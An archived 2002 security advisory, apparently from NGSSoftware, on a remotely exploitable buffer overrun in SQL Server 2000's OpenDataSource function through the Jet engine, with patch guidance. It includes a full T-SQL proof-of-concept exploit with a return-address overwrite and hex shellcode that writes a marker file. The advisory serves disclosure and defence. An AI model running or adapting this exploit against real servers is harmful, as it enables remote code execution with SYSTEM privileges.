20th Jun 2002 [SBWID-5470]
COMMAND
SQL server remote exploit via OpenDataSource function overflow
SYSTEMS AFFECTED
SQL server 2000, Windows 2000 SP 2
PROBLEM
In Mark Litchfield [mark@ngssoftware.com] and David Litchfield
[david@ngssoftware.com] NGSSoftware insight security research advisory
[http://www.ngssoftware.com/vna/ms-sql.txt] [#NISR19062002] :
Microsoft\'s database server SQL Server 2000 has a remotely exploitable
buffer overrun vulnerability in the OpenDataSource function when
combined with the MS Jet Engine. Due to this being a JET problem other
products may also be vulnerable; however the fix for all products
should be the same.
By making a specially crafted SQL query using the OpenDataSource
function it is possible to overflow a buffer in the SQL Server process,
gaining control of its execution remotely. If the SQL Server is running
with SYSTEM privileges, this is default behaviour, then any code
supplied by the attacker in an exploit of the overflow will run
uninhibited. Whilst the overflow is UNICODE in nature, as will be
shown, it is still very easy to exploit.
What must be stressed is that this may be launched via a web server
application if it is vulnerable to SQL Injection so just because no
direct access can be gained to the SQL Server from the Internet does
not mean it is safe. All customers running SQL Server should check
their patch level.
Exploit
=======
This Transact SQL Script will create a file called \"SQL-ODSJET-BO\" on
the root of the C: drive
-------8<---------
-- Simple Proof of Concept
-- Exploits a buffer overrun in OpenDataSource()
--
-- Demonstrates how to exploit a UNICODE overflow using T-SQL
-- Calls CreateFile() creating a file called c:\\SQL-ODSJET-BO
-- I\'m overwriting the saved return address with 0x42B0C9DC
-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
-- The address holds a jmp esp instruction.
--
-- To protect against this overflow download the latest Jet Service
-- pack from Microsoft - http://www.microsoft.com/
--
-- David Litchfield (david@ngssoftware.com)
-- 19th June 2002
declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)
select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141
while @cnt < 1063
begin
select @padding = @padding + @pad
select @cnt = @cnt + 1
end
-- overwrite the saved return address
select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747
-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K
Sp2
-- change if running a different service pack
select @code =
0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0
C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N\'SELECT * FROM
penDataSource( \'\'Microsoft.Jet.OLEDB.4.0\'\',\'\'Data Source=\"c:\\\'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad +
@code
select @exploit = @exploit + N\'\";User ID=Admin;Password=;Extended
properties=Excel 5.0\'\')...xactions\'
exec (@exploit)
------->8---------
SOLUTION
Microsoft recommend that customers should upgrade their version of Jet.
The latest version is available from here:
http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.a
sp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearc
h%26ordinal%3D2%26redirect%3Dno
Further good reading from NGSSoftware :
http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
